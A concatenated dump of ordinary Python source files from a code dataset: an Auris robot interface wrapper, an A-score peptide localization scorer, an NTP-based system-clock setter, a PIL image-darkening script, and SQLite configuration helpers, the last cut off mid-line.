\"\"\" Closes down network and does any other work that needs to be done. \"\"\"\n AurisInterface.CloseNetwork()\n\n\n def CheckIDM(self):\n if (not self.interInit or not self.idmInit):\n print(\"Attempting to use IDM before it is initialized.\")\n raise Exception(\"IDM Initialization\")\n\n\n def CheckVision(self):\n if (not self.interInit or not self.visionInit):\n print(\"Attempting to use Vision before it is initialized.\")\n raise Exception(\"Vision Initialization\")\n\n\n def CheckGamePad(self):\n if (not self.gamepadInit):\n print(\"Attempting to use Game Pad before it is initialized.\")\n raise Exception(\"Game Pad Initialization\")\n\n def CheckLinearSlide(self):\n if (not self.slideInit):\n print(\"Attempting to use Linear Slide before it is initialized.\")\n raise Exception(\"Linear Slide Initialization\")\n\n\n def Initialize(self, domainId, testIPAddr = None):\n print(\"Initializing Network ...\")\n if (testIPAddr != None):\n print(\"Pinging ip (\", testIPAddr, \") (must be UID 0) ...\")\n resp = os.system(\"ping -c 1 \" + testIPAddr)\n if (resp != 0):\n print(\"Failed to ping IDM.\")\n if (AurisInterface.GetVersion() != LOW_LEVEL_VERSION):\n print(\"Python Lib does not match compiled Lib\",\n AurisInterface.GetVersion(),\n \"!= auris low level version \",\n LOW_LEVEL_VERSION)\n return -1\n if (AurisInterface.InitializeNetwork(domainId) != 0):\n print(\"Failed to connect to RTI\")\n return -1\n else:\n print(\"Network Configured.\")\n self.visionInit = True\n self.interInit = True\n sys.stdout.flush()\n return 0\n\n\n def EstablishIDMConnection(self, wait = 10.0):\n if (AurisInterface.EstablishIDMConnection(10.0) != 0):\n print(\"Failed to establish connection\")\n return -1\n else:\n print(\"Connection Established.\")\n self.idmInit = True\n return 0\n\n\n def InitializeGamePad(self):\n \"\"\" Start the joystick code running. 
\"\"\"\n err = AurisInterface.InitializeGamePad()\n if err == 0:\n self.gamepadInit = True\n sys.stdout.flush()\n return self.gamepadInit\n\n def InitializeLinearSlide(self):\n \"\"\" Start the linear slide code running. \"\"\"\n err = AurisInterface.InitializeLinearSlide()\n if err == 0:\n self.slideInit = True\n sys.stdout.flush()\n return self.slideInit\n \n\n def LoadLeader(self, instrument):\n \"\"\" Loads a leader instrument. \"\"\"\n self.CheckIDM()\n return AurisInterface.LoadLeader(instrument)\n\n\n def LoadSheath(self, instrument):\n \"\"\" Loads a sheath instrument. \"\"\"\n self.CheckIDM()\n return AurisInterface.LoadSheath(instrument)\n \n \n def GetMotorCurrents(self):\n \"\"\" Returns the actual currents being applied to each axis. \"\"\"\n self.CheckIDM()\n return AurisInterface.GetMotorCurrents()\n\n \n def GetForceSensors(self):\n \"\"\" Returns the value of the force sensors on each axis. \"\"\"\n self.CheckIDM()\n return AurisInterface.GetForceSensors()\n\n \n def GetDesiredPosition(self):\n \"\"\" Returns the position we have set on each axis. \"\"\"\n self.CheckIDM()\n return AurisInterface.GetDesiredPosition()\n\n \n def SetDesiredPosition(self,\n s1, s2, s3, s4, l1, l2, l3, l4, i1, i2):\n \"\"\" Returns the position we have set on each axis. \n NOTE THE ADDED NEGATIVE!!!\"\"\"\n self.CheckIDM()\n return AurisInterface.SetDesiredPosition(\n s1, s2, s3, s4, l1, l2, l3, l4, -i1, i2)\n\n \n def GetActualPosition(self):\n \"\"\" Returns the position of each axis. \"\"\"\n self.CheckIDM()\n return AurisInterface.GetActualPosition()\n\n \n def SendIDMCommand(self, commandId):\n \"\"\" Send a command (integer) to the IDM. \"\"\"\n self.CheckIDM()\n return AurisInterface.SendIDMCommand(commandId)\n\n\n def GetIDMStatus(self):\n \"\"\" Returns the current IDM status (int). \"\"\"\n self.CheckIDM()\n return AurisInterface.GetIDMStatus()\n\n\n def GetLeaderTensionStatus(self):\n \"\"\" Returns the tensioning status of the leader \"\"\"\n self.CheckIDM()\n return AurisInterface.GetTensionStatus()[1]\n\n\n def GetSheathTensionStatus(self):\n \"\"\" Returns the tensioning status of the leader \"\"\"\n self.CheckIDM()\n return AurisInterface.GetTensionStatus()[0]\n\n\n def GetVisionResult(self):\n \"\"\" Returns the last vision result from the ClinicalUI. \"\"\"\n self.CheckVision()\n return AurisInterface.GetVisionResult()\n\n\n def GetGamePadButton(self, index):\n \"\"\" Return the value of the button at the given index. \"\"\"\n self.CheckGamePad()\n return AurisInterface.GetGamePadButton(index)\n\n\n def GetGamePadJoint(self, index):\n \"\"\" Return the value of the joint at the given index. \"\"\"\n self.CheckGamePad()\n return AurisInterface.GetGamePadJoint(index)\n\n def LinearSlideHome(self):\n \"\"\" Reset and goto the zero on the linear slide. \"\"\"\n self.CheckLinearSlide()\n return AurisInterface.LinearSlideHome()\n\n def LinearSlideMove(self, Xmm):\n \"\"\" Set the x position in milimeters of the slide. \"\"\"\n self.CheckLinearSlide()\n return AurisInterface.LinearSlideMove(Xmm)\n \n def LinearSlideMotorRunning(self):\n \"\"\" Returns true when the motor is on. \"\"\"\n self.CheckLinearSlide()\n return AurisInterface.LinearSlideMotorRunning()\n\n def LinearSlideWaitForStop(self, timeoutSec):\n \"\"\" Blocks until the motor stops moveing or timeout is reached. 
Returns -1 if\n timedout and zero otherwise.\"\"\"\n self.CheckLinearSlide()\n return AurisInterface.LinearSlideWaitForStop(timeoutSec)\n\n def LinearSlidePosition(self):\n \"\"\" Get the current x position in millimeters. \"\"\"\n self.CheckLinearSlide()\n return AurisInterface.LinearSlidePosition()\n\n def LinearSlideMinLimit(self):\n \"\"\" Return the lowest allowable position in millimeters. \"\"\"\n self.CheckLinearSlide()\n return AurisInterface.LinearSlideMinLimit()\n \n def LinearSlideMaxLimit(self):\n \"\"\" Return the highest allowable position in millimeters. \"\"\"\n self.CheckLinearSlide()\n return AurisInterface.LinearSlideMaxLimit()\n\n def LinearSlideEnableButtonMode(self, run):\n \"\"\" Toggle automatic listening to joystick (must init joystick). \"\"\"\n self.CheckLinearSlide()\n return AurisInterface.LinearSlideEnableButtonMode(run)\n\n\n# g_PyAuris = PyAurisInterface() \n","sub_path":"catheter_simulation/robot/private/AurisLowLevel.py","file_name":"AurisLowLevel.py","file_ext":"py","file_size_in_byte":8610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"355149247","text":"# -*- coding: utf-8 -*-\nimport itertools\nimport math\n\nfrom collections import namedtuple, defaultdict\nfrom decimal import Decimal\n\nimport numpy as np\nfrom scipy.special import comb\n\nfrom glycopeptidepy.utils.memoize import memoize\nfrom glycopeptidepy.algorithm import PeptidoformGenerator, ModificationSiteAssignmentCombinator\n\nfrom ms_deisotope.peak_set import window_peak_set\n\n\nMAX_MISSING_A_SCORE = 1e3\n\n\n@memoize(100000000000)\ndef binomial_pmf(n, i, p):\n try:\n return comb(n, i, exact=True) * (p ** i) * ((1 - p) ** (n - i))\n except OverflowError:\n dn = Decimal(n)\n di = Decimal(i)\n dp = Decimal(p)\n x = math.factorial(dn) / (math.factorial(di) * math.factorial(dn - di))\n return float(x * dp ** di * ((1 - dp) ** (dn - di)))\n\n\nclass PeakWindow(object):\n def __init__(self, peaks):\n self.peaks = list(peaks)\n self.max_mass = 0\n self._calculate()\n\n def __iter__(self):\n return iter(self.peaks)\n\n def __getitem__(self, i):\n return self.peaks[i]\n\n def __len__(self):\n return len(self.peaks)\n\n def _calculate(self):\n self.peaks.sort(key=lambda x: x.intensity, reverse=True)\n self.max_mass = 0\n for peak in self.peaks:\n if peak.neutral_mass > self.max_mass:\n self.max_mass = peak.neutral_mass\n\n def __repr__(self):\n template = \"{self.__class__.__name__}({self.max_mass}, {size})\"\n return template.format(self=self, size=len(self))\n\n\n\nclass BlindPeptidoformGenerator(PeptidoformGenerator):\n \"\"\"A sub-class of the :class:`~.PeptidoformGenerator` type that ignores\n site-specificities.\n \"\"\"\n def modification_sites(self, sequence):\n variable_sites = {\n mod.name: set(range(len(sequence))) for mod in self.variable_modifications}\n modification_sites = ModificationSiteAssignmentCombinator(\n variable_sites)\n return modification_sites\n\n\nProbableSitePair = namedtuple(\"ProbableSitePair\", ['peptide1', 'peptide2', 'modifications', 'peak_depth'])\n_ModificationAssignment = namedtuple(\"ModificationAssignment\", [\"site\", \"modification\"])\n\n\nclass ModificationAssignment(_ModificationAssignment):\n __slots__ = []\n\n @property\n def is_ambiguous(self):\n try:\n return len(self.site) > 1\n except TypeError:\n return False\n\n def itersites(self):\n if self.is_ambiguous:\n for i in self.site:\n yield i\n else:\n yield self.site\n\n\nclass AScoreCandidate(object):\n def __init__(self, peptide, 
modifications, fragments=None):\n self.peptide = peptide\n self.modifications = modifications\n self.fragments = fragments\n\n def __hash__(self):\n return hash(self.peptide)\n\n def __eq__(self, other):\n return self.peptide == other.peptide and self.modifications == other.modifications\n\n def make_solution(self, a_score, permutations=None):\n return AScoreSolution(self.peptide, a_score, self.modifications, permutations, self.fragments)\n\n def __repr__(self):\n template = \"{self.__class__.__name__}({d})\"\n\n def formatvalue(v):\n if isinstance(v, float):\n return \"%0.4f\" % v\n else:\n return str(v)\n d = [\n \"%s=%s\" % (k, formatvalue(v)) if v is not self else \"(...)\" for k, v in sorted(\n self.__dict__.items(), key=lambda x: x[0])\n if (not k.startswith(\"_\") and not callable(v))\n and not (v is None) and k != \"fragments\"]\n\n return template.format(self=self, d=', '.join(d))\n\n\nclass AScoreSolution(AScoreCandidate):\n def __init__(self, peptide, a_score, modifications, permutations, fragments=None):\n super(AScoreSolution, self).__init__(peptide, modifications, fragments)\n self.a_score = a_score\n self.permutations = permutations\n\n\nclass PeptidoformPermuter(object):\n def __init__(self, peptide, modification_rule, modification_count=1, respect_specificity=True):\n self.peptide = peptide\n self.modification_rule = modification_rule\n self.modification_count = modification_count\n self.respect_specificity = respect_specificity\n\n def find_existing(self, modification_rule):\n '''Find existing modifications derived from this rule\n\n Parameters\n ----------\n modification_rule: :class:`~.ModificationRule`\n The modification rule to search for\n\n Returns\n -------\n indices: list\n The indices of :attr:`peptide` where modifications were found\n '''\n indices = []\n for i, position in enumerate(self.peptide):\n if modification_rule in position.modifications:\n indices.append(i)\n return indices\n\n def generate_base_peptides(self, modification_rule):\n \"\"\"Generate peptides from :attr:`peptide` which have had combinations of\n modification sites removed.\n\n Parameters\n ----------\n modification_rule : :class:`~.ModificationRule`\n The modification rule to remove\n\n Returns\n -------\n list\n \"\"\"\n existing_indices = self.find_existing(modification_rule)\n base_peptides = []\n for indices in itertools.combinations(existing_indices, self.modification_count):\n base_peptide = self.peptide.clone()\n for i in indices:\n base_peptide.drop_modification(i, modification_rule)\n base_peptides.append(base_peptide)\n # The target modification was not present, so the unaltered peptide must be the base\n if not base_peptides:\n base_peptides = [self.peptide.clone()]\n return base_peptides\n\n def generate_peptidoforms(self, modification_rule, base_peptides=None):\n if base_peptides is None:\n base_peptides = self.generate_base_peptides(modification_rule)\n if self.respect_specificity:\n PeptidoformGeneratorType = PeptidoformGenerator\n else:\n PeptidoformGeneratorType = BlindPeptidoformGenerator\n pepgen = PeptidoformGeneratorType(\n [], [modification_rule], self.modification_count)\n peptidoforms = defaultdict(set)\n for base_peptide in base_peptides:\n mod_combos = pepgen.modification_sites(base_peptide)\n for mod_combo in mod_combos:\n if len(mod_combo) != self.modification_count:\n continue\n mod_combo = [ModificationAssignment(*mc) for mc in mod_combo]\n peptidoform, _n_mods = pepgen.apply_variable_modifications(\n base_peptide, mod_combo, None, None)\n 
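# Identical peptidoforms arising from different base peptides or different\n                # site combinations hash to the same dict key, so the set union below\n                # pools every modification-site assignment that can produce this form.\n                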
peptidoforms[peptidoform].update(tuple(mod_combo))\n return [AScoreCandidate(peptide, sorted(mods), self._generate_fragments(peptide))\n for peptide, mods in peptidoforms.items()]\n\n\nclass AScoreEvaluator(PeptidoformPermuter):\n '''\n Calculate a localization statistic for given peptidoform and modification rule.\n\n The original probabilistic model is described in [1]. Implementation based heavily\n on the OpenMS implementation [2].\n\n References\n ----------\n [1] Beausoleil, S. a, Villén, J., Gerber, S. a, Rush, J., & Gygi, S. P. (2006).\n A probability-based approach for high-throughput protein phosphorylation analysis\n and site localization. Nature Biotechnology, 24(10), 1285–1292. https://doi.org/10.1038/nbt1240\n [2] Rost, H. L., Sachsenberg, T., Aiche, S., Bielow, C., Weisser, H., Aicheler, F., … Kohlbacher, O. (2016).\n OpenMS: a flexible open-source software platform for mass spectrometry data analysis. Nat Meth, 13(9),\n 741–748. https://doi.org/10.1038/nmeth.3959\n '''\n def __init__(self, scan, peptide, modification_rule, modification_count=1, respect_specificity=True):\n self._scan = None\n self.peak_windows = []\n\n PeptidoformPermuter.__init__(\n self, peptide, modification_rule, modification_count, respect_specificity)\n self.scan = scan\n self.peptidoforms = self.generate_peptidoforms(self.modification_rule)\n self._fragment_cache = {}\n\n @property\n def scan(self):\n return self._scan\n\n @scan.setter\n def scan(self, value):\n self._scan = value\n if value is None:\n self.peak_windows = []\n else:\n self.peak_windows = list(map(PeakWindow, window_peak_set(value.deconvoluted_peak_set)))\n\n def _generate_fragments(self, peptidoform):\n frags = itertools.chain.from_iterable(\n itertools.chain(\n peptidoform.get_fragments(\"y\"),\n peptidoform.get_fragments(\"b\")))\n frags = list(frags)\n frags.sort(key=lambda x: x.mass)\n return frags\n\n def match_ions(self, fragments, depth=10, error_tolerance=1e-5):\n '''Match fragments against the windowed peak set at a given\n peak depth.\n\n Parameters\n ----------\n fragments: list\n A list of peptide fragments, sorted by mass\n depth: int\n The peak depth to search to, the `i`th most intense peak in\n each window\n error_tolerance: float\n The PPM error tolerance to use when matching peaks.\n\n Returns\n -------\n int:\n The number of fragments matched\n '''\n n = 0\n window_i = 0\n window_n = len(self.peak_windows)\n current_window = self.peak_windows[window_i]\n for frag in fragments:\n while not current_window or (frag.mass >= (current_window.max_mass + 1)):\n window_i += 1\n if window_i == window_n:\n return n\n current_window = self.peak_windows[window_i]\n for peak in current_window[:depth]:\n if abs(peak.neutral_mass - frag.mass) / frag.mass < error_tolerance:\n n += 1\n return n\n\n def permutation_score(self, peptidoform, error_tolerance=1e-5):\n '''Calculate the binomial statistic for this peptidoform\n using the top 1 to 10 peaks.\n\n Parameters\n ----------\n peptidoform: :class:`~.PeptideSequence`\n The peptidoform to score\n error_tolerance: float\n The PPM error tolerance to use when matching peaks.\n\n Returns\n -------\n :class:`numpy.ndarray`:\n The binomial score at peak depth `i + 1`\n\n See Also\n --------\n :meth:`_score_at_window_depth`\n :meth:`match_ions`\n '''\n fragments = peptidoform.fragments\n N = len(fragments)\n site_scores = np.zeros(10)\n for i in range(1, 11):\n site_scores[i - 1] = self._score_at_window_depth(\n fragments, N, i, error_tolerance)\n return site_scores\n\n def 
_score_at_window_depth(self, fragments, N, i, error_tolerance=1e-5):\n '''Score a fragment collection at a given peak depth, and\n calculate the binomial score based upon the probability mass\n function.\n\n Parameters\n ----------\n fragments: list\n A list of peptide fragments, sorted by mass\n N: int\n The maximum number of theoretical fragments\n i: int\n The peak depth to search through\n error_tolerance: float\n The PPM error tolerance to use when matching peaks.\n\n Returns\n -------\n float\n '''\n n = self.match_ions(fragments, i, error_tolerance=error_tolerance)\n p = i / 100.0\n # If a fragment matches twice, this count can exceed the theoretical maximum.\n if n > N:\n n = N\n cumulative_score = binomial_pmf(N, n, p)\n if cumulative_score == 0.0:\n return 1e3\n return (abs(-10.0 * math.log10(cumulative_score)))\n\n def rank_permutations(self, permutation_scores):\n \"\"\"Rank generated peptidoforms by weighted sum of permutation scores\n\n Parameters\n ----------\n permutation_scores : :class:`list` of :class:`list` of :class:`float`\n The raw output of :meth:`permutation_score` for each peak depth for\n each peptidoform.\n\n Returns\n -------\n :class:`list`\n A list of :class:`tuple` instances of (weighted score, peptidoform index)\n \"\"\"\n ranking = []\n for i, perm_scores in enumerate(permutation_scores):\n ranking.append((self._weighted_score(perm_scores), i))\n ranking.sort(reverse=True)\n return ranking\n\n # Taken directly from reference [1]\n _weight_vector = np.array([\n 0.5, 0.75, 1.0, 1.0, 1.0, 1.0, 0.75, 0.5, .25, .25\n ])\n\n def _weighted_score(self, scores):\n \"\"\"Calculate the weighted sum score over the peak-depth permuted\n binomial score vector.\n\n Parameters\n ----------\n scores : :class:`list`\n The binomial score at each peak depth\n\n Returns\n -------\n float\n \"\"\"\n return self._weight_vector.dot(scores) / 10.0\n\n def score_solutions(self, error_tolerance=1e-5, peptidoforms=None):\n if peptidoforms is None:\n peptidoforms = self.peptidoforms\n scores = [self.permutation_score(candidate, error_tolerance=error_tolerance)\n for candidate in peptidoforms]\n ranked = self.rank_permutations(scores)\n solutions = [peptidoforms[i].make_solution(score, scores[i])\n for score, i in ranked]\n return solutions\n\n def score_localizations(self, solutions, error_tolerance=1e-5):\n \"\"\"Find pairs of sequence solutions which differ in the localization\n of individual modifications w.r.t. to the best match to compute the final\n per-modification A-score.\n\n The first solution in `solutions` is the highest ranked solution, and subsequent\n solutions are searched for the next case where one of the modification of interest\n is located at a different position, forming a pair for that modification site by\n :meth:`find_highest_scoring_permutations`. For each pair, the sequences are re-scored\n using only site-determining ions, and the difference between those scores is the A-score\n for that pair's modification site, as calculated by :meth:`calculate_delta`.\n\n If there are no alternative sites for a given modification, that modification will be\n given the A-score given by :const:`MAX_MISSING_A_SCORE`. 
If there is another\n localization which scores equally well, the A-score will be 0 by definition of\n the delta step.\n\n Parameters\n ----------\n solutions : list\n The list of :class:`AScoreSolution` objects, ranked by total score\n error_tolerance : float, optional\n The mass error tolerance to use when matching site-determining ions (the default is 1e-5)\n\n Returns\n -------\n :class:`AScoreSolution`\n \"\"\"\n delta_scores = []\n pairs = self.find_highest_scoring_permutations(solutions)\n peptide = solutions[0]\n if not pairs:\n for mod in peptide.modifications:\n delta_scores.append((mod, MAX_MISSING_A_SCORE))\n peptide.a_score = delta_scores\n return peptide\n for pair in pairs:\n delta_score = self.calculate_delta(pair, error_tolerance=error_tolerance)\n pair.peptide1.a_score = delta_score\n delta_scores.append((pair.modifications, delta_score))\n peptide.a_score = delta_scores\n return peptide\n\n def score(self, error_tolerance=1e-5):\n solutions = self.score_solutions(error_tolerance)\n peptide = self.score_localizations(solutions, error_tolerance)\n return peptide\n\n def find_highest_scoring_permutations(self, solutions, best_solution=None, offset=None):\n if best_solution is None:\n best_solution = solutions[0]\n offset = 1\n else:\n if offset is None:\n for i, sol in enumerate(solutions):\n if sol == solutions:\n offset = i + 1\n break\n else:\n raise ValueError(\"Best solution %r not in solution set\")\n permutation_pairs = []\n # for each modification under permutation, find the next best solution which\n # does not have this modification in its set of permuted modifications, and\n # package the pair into a :class:`ProbableSitePair`.\n for site in best_solution.modifications:\n for alt_solution in solutions[offset:]:\n if site not in alt_solution.modifications:\n peak_depth = np.argmax(best_solution.permutations - alt_solution.permutations) + 1\n permutation_pairs.append(ProbableSitePair(best_solution, alt_solution, site, peak_depth))\n break\n return permutation_pairs\n\n def site_determining_ions(self, solutions):\n frag_sets = [set(sol.fragments) for sol in solutions]\n common = set.intersection(*frag_sets)\n n = len(solutions)\n site_determining = []\n for i, _solution in enumerate(solutions):\n cur_frags = frag_sets[i]\n if i == n - 1:\n diff = cur_frags - common\n site_determining.append(sorted(diff, key=lambda x: x.mass))\n else:\n diff = cur_frags - common - frag_sets[i + 1]\n site_determining.append(sorted(diff, key=lambda x: x.mass))\n return site_determining\n\n def calculate_delta(self, candidate_pair, error_tolerance=1e-5):\n if candidate_pair.peptide1 == candidate_pair.peptide2:\n return 0.0\n site_frags = self.site_determining_ions(\n [candidate_pair.peptide1, candidate_pair.peptide2])\n site_frags1, site_frags2 = site_frags[0], site_frags[1]\n N1 = len(site_frags1)\n N2 = len(site_frags2)\n peak_depth = candidate_pair.peak_depth\n P1 = self._score_at_window_depth(\n site_frags1, N1, peak_depth, error_tolerance=error_tolerance)\n P2 = self._score_at_window_depth(\n site_frags2, N2, peak_depth, error_tolerance=error_tolerance)\n return P1 - P2\n","sub_path":"glycan_profiling/tandem/peptide/scoring/localize.py","file_name":"localize.py","file_ext":"py","file_size_in_byte":18452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"171082473","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n通过 ntplib 修改系统时间\n1. 如果不带上参数, 进行ntpdate时间同步\n2. 如果参数格式为 \"年-月-日 时:分:秒\", 设置为对应时间\n3. 
import sys\nimport os\nimport time\nfrom datetime import datetime\n\nNTP_SERVER = 'cn.pool.ntp.org'\n\ndef get_local_dt_from_ntp():\n    import ntplib\n    c = ntplib.NTPClient()\n    response = c.request(NTP_SERVER)\n    ts = response.tx_time\n    dt_obj = time.localtime(ts)\n    return dt_obj\n\n\ndef set_local_dt(dt_obj, use_ntp=False):\n    if use_ntp:\n        dt_obj = get_local_dt_from_ntp()\n\n    date_str = time.strftime('%Y-%m-%d', dt_obj)\n    time_str = time.strftime('%X', dt_obj)\n    # time_str = time.strftime('%H:%M:%S', dt_obj)  # the same as above\n    print('date {} and time {}'.format(date_str, time_str))\n\n    if sys.platform in ['win32', 'cygwin']:\n        os.system('date {} && time {}'.format(date_str, time_str))\n    else:  # linux/linux2/darwin\n        '''\n        See http://osxdaily.com/2012/07/04/set-system-time-mac-os-x-command-line/\n        The date command only syncs down to the minute; seconds are reset to 0.\n        To sync down to the second, run: sudo ntpdate -u cn.pool.ntp.org\n        '''\n        if use_ntp:\n            os.system('sudo ntpdate -u %s' % NTP_SERVER)\n        else:\n            os.system('sudo date %s' % time.strftime('%m%d%H%M%y', dt_obj))\n\n\nif __name__ == '__main__':\n    if len(sys.argv) <= 1:  # no arguments\n        set_local_dt(None, use_ntp=True)\n        sys.exit(0)\n    _arg1 = sys.argv[1]\n    try:\n        # datetime string format\n        _dt = datetime.strptime(_arg1, '%Y-%m-%d %H:%M:%S')\n        set_local_dt(_dt.timetuple())\n    except ValueError:\n        # timestamp format\n        _dt_obj = time.localtime(float(_arg1))\n        set_local_dt(_dt_obj)\n","sub_path":"set_time_with_ntplib.py","file_name":"set_time_with_ntplib.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"69296338","text":"from PIL import Image\n\ndef half_RGB(img):\n    \"\"\"reduce the RGB values of each pixel by half\n    img: PIL Image\n    return : reduced image\n    \"\"\"\n    newImgData = []\n    for color in img.getdata():\n        r,g,b = color\n        newR,newG,newB = r//2, g//2, b//2\n        newImgData.append((newR,newG,newB))\n    newImg = Image.new(img.mode, img.size)\n    newImg.putdata(newImgData)\n    return newImg\n\n\n\n\ndef main():\n    image = Image.open('westbrook.jpg')\n\n    rgb_im = image.convert('RGB')\n\n    r_img = half_RGB(rgb_im)\n\n    r_img.show()\n    r_img.save('Q2.jpg')\n\nif __name__ == '__main__':\n    main()\n","sub_path":"hw0/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"142565130","text":"import sqlite3\nfrom sqlite3 import Error\n\n# function to select all the contents from a table specified in the sql expression that is the input to the function\ndef select_all_from_table(sql):\n    \"\"\" select values from specified table\"\"\"\n\n    db_file = r\"C:\\FaultMap\\pythonsqlite.db\"\n\n    conn = create_connection(db_file)\n\n    try:\n        cur = conn.cursor()\n        cur.execute(sql)\n        content_tuple = cur.fetchall()\n\n        cases = []\n        for row in content_tuple:\n            cases.append(list(row))\n\n    except Error as e:\n        print(e)\n    finally:\n        if conn:\n            conn.close()\n    return cases\n\ndef create_connection(db_file):\n    \"\"\" create a database connection to the SQLite databases\"\"\"\n    conn = None\n    try:\n        conn = sqlite3.connect(db_file)\n        return conn\n    except Error as e:\n        print(e)\n    return conn\n\ndef create_table(conn, sql):\n    \"\"\" create a table from the create_table_sql statement\"\"\"\n    try:\n        cur = conn.cursor()\n        cur.execute(sql)\n    except Error as e:\n        print(e)\n    finally:\n        if 
conn:\n conn.close()\n\ndef insert_into_table(conn, sql, values):\n \"\"\" insert values into specified table\"\"\"\n try:\n cur = conn.cursor()\n cur.execute(sql, values)\n conn.commit()\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()\n return #cur.lastrowid\n\ndef delete_from_table(conn, sql, values):\n \"\"\" delete values from specified table\"\"\"\n try:\n cur = conn.cursor()\n cur.execute(sql, values)\n conn.commit()\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()\n return #cur.lastrowid\n\ndef drop_table(conn, sql):\n \"\"\" select values from specified table\"\"\"\n try:\n cur = conn.cursor()\n cur.execute(sql)\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()\n\n\ndef select_from_table_scenarios(case_id):\n \"\"\" select values from specified table\"\"\"\n\n db_file = r\"C:\\FaultMap\\pythonsqlite.db\"\n sql = ''' SELECT * FROM scenarios WHERE case_id = ?'''\n conn = create_connection(db_file)\n\n search_id = (case_id,);\n\n try:\n cur = conn.cursor()\n cur.execute(sql, search_id)\n content_tuple = cur.fetchall()\n\n scenarios = []\n for row in content_tuple:\n scenarios.append(list(row))\n\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()\n return scenarios\n\ndef select_from_table_where(sql,id):\n \"\"\" select values from specified table\"\"\"\n\n db_file = r\"C:\\FaultMap\\pythonsqlite.db\"\n conn = create_connection(db_file)\n\n search_id = (id,);\n\n try:\n cur = conn.cursor()\n cur.execute(sql, search_id)\n content_tuple = cur.fetchall()\n\n result = []\n for row in content_tuple:\n result.append(list(row))\n\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()\n return result\n\n\ndef convert_db_info_to_dict_weightcalc(case_id):\n sql = ''' SELECT * FROM methods WHERE case_id = ?'''\n # case_id = 1\n methods_table = select_from_table_where(sql, case_id)\n methods = []\n for method in methods_table:\n if method[2] == 1: methods.append('transfer_entropy_kernel')\n if method[3] == 1: methods.append('transfer_entropy_kraskov')\n if method[4] == 1: methods.append('cross_correlation')\n if method[5] == 1: methods.append('partial_correlation')\n\n sql = ''' SELECT * FROM scenarios WHERE case_id = ?'''\n case_id = 1\n scenarios_info = select_from_table_where(sql, case_id)\n scenarios = [i[1] for i in scenarios_info]\n\n caseconfig = {}\n caseconfig['datatype'] = 'file'\n caseconfig['methods'] = [i for i in methods]\n caseconfig['scenarios'] = [i for i in scenarios]\n scenario_ids = [i[0] for i in scenarios_info]\n\n for scenario_id in scenario_ids:\n sql = ''' SELECT * FROM settings WHERE scenario_id = ?'''\n # scenario_id = 1\n settings_info = select_from_table_where(sql, scenario_id)\n\n for setting in settings_info:\n caseconfig[setting[1]] = {\n 'use_connections': bool(setting[3]),\n 'transient': bool(setting[4]),\n 'boxnum': setting[5],\n 'boxsize': setting[6],\n 'normalise': setting[7],\n 'detrend': bool(setting[8]),\n 'delaytype': setting[9],\n 'sampling_rate': setting[10],\n 'sub_sampling_interval': setting[11],\n 'sampling_unit': setting[12],\n 'testsize': setting[13],\n 'startindex': setting[14],\n 'sigtest': bool(setting[15]),\n 'thresh_method': setting[16],\n 'surr_method': setting[17],\n 'allthresh': bool(setting[18]),\n 'additional_parameters': {\n 'test_significance': bool(setting[19]),\n 'signifigance_permutations': setting[20],\n 'auto_embed': bool(setting[21])\n }\n }\n\n for scenario in scenarios_info:\n caseconfig[scenario[1]] = {\n 'settings': [i[1] for i in 
settings_info],\n 'data': scenario[3],\n 'test_delays': scenario[4],\n 'causevarindexes': scenario[5],\n 'affectedvarindexes': scenario[6],\n 'bandgap_filtering': bool(scenario[7]),\n 'bidirectional_delays': bool(scenario[8]),\n 'scalelimits': scenario[9]\n }\n\n caseconfig['methods_store'] = methods\n caseconfig['scenario_store'] = [i for i in scenarios]\n\n return caseconfig\n\ndef convert_db_info_to_dict_graphreduce(case_id):\n sql = ''' SELECT * FROM scenarios WHERE case_id = ?'''\n scenarios_info = select_from_table_where(sql,case_id)\n\n caseconfig = {}\n caseconfig['datatype'] = 'file'\n caseconfig['scenarios'] = [i[1] for i in scenarios_info]\n caseconfig['scenario_store'] = [i[1] for i in scenarios_info]\n\n for scenario in scenarios_info:\n scenario_id = scenario[0]\n scenario_name = scenario[1]\n sql = ''' SELECT * FROM graphreduce WHERE scenario_id = ?'''\n graphreduce_table = select_from_table_where(sql,scenario_id)\n caseconfig[scenario_name] = {\n 'graph':graphreduce_table[0][2],\n 'percentile':graphreduce_table[0][3],\n 'depth':graphreduce_table[0][4],\n 'weight_discretion':bool(graphreduce_table[0][5])\n }\n return caseconfig\n\ndef convert_db_info_to_dict_resultrecon(case_id):\n sql = ''' SELECT * FROM scenarios WHERE case_id = ?'''\n scenarios_info = select_from_table_where(sql,case_id)\n\n caseconfig = {}\n caseconfig['datatype'] = 'file'\n caseconfig['scenarios'] = [i[1] for i in scenarios_info]\n caseconfig['scenario_store'] = [i[1] for i in scenarios_info]\n\n for scenario in scenarios_info:\n scenario_id = scenario[0]\n scenario_name = scenario[1]\n sql = ''' SELECT * FROM resultreconstruction WHERE scenario_id = ?'''\n resultrecon_table = select_from_table_where(sql,scenario_id)\n caseconfig[scenario_name] = {\n 'bias_correction':bool(resultrecon_table[0][2])\n }\n return caseconfig\n\n\ndef update_table_where(sql_update, sql_select, id):\n \"\"\" select values from specified table\"\"\"\n\n db_file = r\"C:\\FaultMap\\pythonsqlite.db\"\n conn = create_connection(db_file)\n\n update_id = (id,);\n result = []\n try:\n cur = conn.cursor()\n cur.execute(sql_update, update_id)\n conn.commit()\n cur.execute(sql_select, update_id)\n content_tuple = cur.fetchall()\n\n for row in content_tuple:\n result.append(list(row))\n\n except Error as e:\n print(e)\n finally:\n if conn:\n conn.close()\n return result\n\n\ndef convert_db_info_to_dict_noderank(case_id):\n sql = ''' SELECT * FROM scenarios WHERE case_id = ?'''\n scenarios_info = select_from_table_where(sql, case_id)\n\n caseconfig = {}\n caseconfig['datatype'] = 'file'\n caseconfig['scenarios'] = [i[1] for i in 